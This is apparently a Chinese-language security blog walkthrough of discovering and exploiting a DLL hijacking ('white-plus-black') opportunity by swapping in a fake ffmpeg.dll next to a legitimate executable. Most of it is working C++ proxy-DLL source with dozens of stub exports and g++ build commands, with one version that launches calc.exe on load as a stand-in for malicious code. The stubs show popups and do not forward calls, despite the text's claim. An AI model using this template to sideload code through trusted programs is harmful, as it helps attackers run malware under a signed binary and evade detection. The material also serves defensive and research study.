记一次DLL劫持白加黑挖掘过程

工具ZeroEye https://github.com/ImCoriander/ZeroEye

先扫描电脑上的exe：

扫描完后会在当前目录生成：

这里拿某box演示:

此处有一个exe和一个dll，Dll就是可被用来劫持的目标

Infos中有相应dll的函数信息：

如果直接执行会发生什么？

这里会发现exe无法找到对应函数，所以要将上面infos文件夹中对应dll的函数进行转发

编写cpp文件：

#include <Windows.h>
#pragma comment(lib, "user32.lib")

// 加载原始ffmpeg.dll的句柄
HMODULE hOriginalDll = nullptr;

// 定义函数指针类型（示例仅展示部分函数，需补充全部）
typedef int(*av_buffer_create_t)();
av_buffer_create_t pOriginal_av_buffer_create = nullptr;

typedef int(*av_dict_count_t)();
av_dict_count_t pOriginal_av_dict_count = nullptr;

// 加载原始DLL并初始化函数指针
void InitOriginalDll() {
    // 原始DLL路径（当前目录）
    const char* originalDllPath = "./ffmpeg_original.dll";
    
    // 加载原始DLL
    hOriginalDll = LoadLibraryA(originalDllPath);
    if (!hOriginalDll) {
        MessageBoxA(NULL, "The original DLL failed to load!", "error", MB_ICONERROR);
        return;
    }
}

// DLL入口函数
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason, LPVOID lpReserved) {
    switch (ul_reason) {
    case DLL_PROCESS_ATTACH:
        // 劫持弹窗
        MessageBoxA(NULL, "DLL Hijack Success!", "Success", MB_ICONWARNING);
        // 初始化原始DLL
        InitOriginalDll();
        break;
    case DLL_PROCESS_DETACH:
        if (hOriginalDll) FreeLibrary(hOriginalDll);
        break;
    }
    return TRUE;
}

// 导出函数转发（需为每个函数编写）
extern "C" __declspec(dllexport) int av_buffer_create() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_buffer_get_opaque() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_dict_count() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_dict_free() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_dict_get() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_dict_set() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_force_cpu_flags() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_frame_alloc() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_frame_clone() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_frame_free() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_frame_unref() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_free() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_get_bytes_per_sample() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_get_cpu_flags() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_image_check_size() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_init_packet() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_log_set_level() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_malloc() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_max_alloc() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_new_packet() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_packet_alloc() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_packet_copy_props() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_packet_free() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_packet_get_side_data() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_packet_unref() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_rdft_calc() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_rdft_end() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_rdft_init() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_read_frame() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_rescale_q() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_samples_get_buffer_size() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_seek_frame() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_stream_get_first_dts() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_stream_get_side_data() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_strerror() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avcodec_align_dimensions() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avcodec_alloc_context3() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avcodec_descriptor_get() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avcodec_descriptor_next() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avcodec_find_decoder() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avcodec_flush_buffers() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avcodec_free_context() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avcodec_get_name() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avcodec_open2() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avcodec_parameters_to_context() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avcodec_receive_frame() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avcodec_send_packet() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avformat_alloc_context() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avformat_close_input() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avformat_find_stream_info() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avformat_free_context() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avformat_open_input() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avio_alloc_context() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avio_close() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }

编译：

plaintext

g++ -shared -o ffmpeg.dll main.cpp -luser32 -Wl,--subsystem,windows

其中对应要编译出的dll文件名和源代码名

编译需要有编译环境，这里使用MinGW CC++工具链

参考链接：
https://blog.csdn.net/qq_25536087/article/details/120425466

编译后得到：

这里先将原来的dll改一下名字：

原来的改成ffmpeg_original.dll

然后将编译好的dll放入原来文件夹:

点击exe运行：

通过加载原始DLL并转发函数调用，确保程序在调用被劫持的DLL时仍能正常执行原有逻辑。

例如：

劫持DLL中仅添加弹窗或执行恶意代码，但核心功能仍需依赖原始DLL

若劫持DLL未转发函数调用，程序可能因缺少关键功能而崩溃或报错

尝试不保留原始DLL，执行calc：

编写main2.cpp

#include <Windows.h>

// 启动计算器
void ExecutePayload() {
    STARTUPINFOA si = { sizeof(STARTUPINFOA) };
    PROCESS_INFORMATION pi;
    CreateProcessA(
        "C:\\Windows\\System32\\calc.exe",  // 目标程序路径
        NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi
    );
    // 清理进程句柄
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason, LPVOID lpReserved) {
    if (ul_reason == DLL_PROCESS_ATTACH) {  // 仅在DLL加载时触发
        ExecutePayload();
    }
    return TRUE;  // 必须返回TRUE表示成功[6,9](@ref)
}

// 导出函数转发（需为每个函数编写）
extern "C" __declspec(dllexport) int av_buffer_create() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_buffer_get_opaque() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_dict_count() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_dict_free() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_dict_get() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_dict_set() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_force_cpu_flags() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_frame_alloc() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_frame_clone() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_frame_free() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_frame_unref() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_free() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_get_bytes_per_sample() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_get_cpu_flags() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_image_check_size() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_init_packet() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_log_set_level() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_malloc() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_max_alloc() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_new_packet() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_packet_alloc() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_packet_copy_props() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_packet_free() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_packet_get_side_data() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_packet_unref() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_rdft_calc() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_rdft_end() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_rdft_init() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_read_frame() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_rescale_q() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_samples_get_buffer_size() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_seek_frame() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_stream_get_first_dts() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_stream_get_side_data() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int av_strerror() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avcodec_align_dimensions() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avcodec_alloc_context3() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avcodec_descriptor_get() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avcodec_descriptor_next() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avcodec_find_decoder() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avcodec_flush_buffers() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avcodec_free_context() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avcodec_get_name() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avcodec_open2() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avcodec_parameters_to_context() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avcodec_receive_frame() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avcodec_send_packet() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avformat_alloc_context() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avformat_close_input() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avformat_find_stream_info() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avformat_free_context() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avformat_open_input() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avio_alloc_context() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }
extern "C" __declspec(dllexport) int avio_close() {     MessageBoxA(0,__FUNCTION__,0,0);    return 0;   }

同样的方法编译：

plaintext

g++ -shared -o ffmpeg.dll main2.cpp -luser32 -Wl,--subsystem,windows

执行exe

此处成功替换劫持原dll并执行自定义函数触发calc

微信扫一扫：分享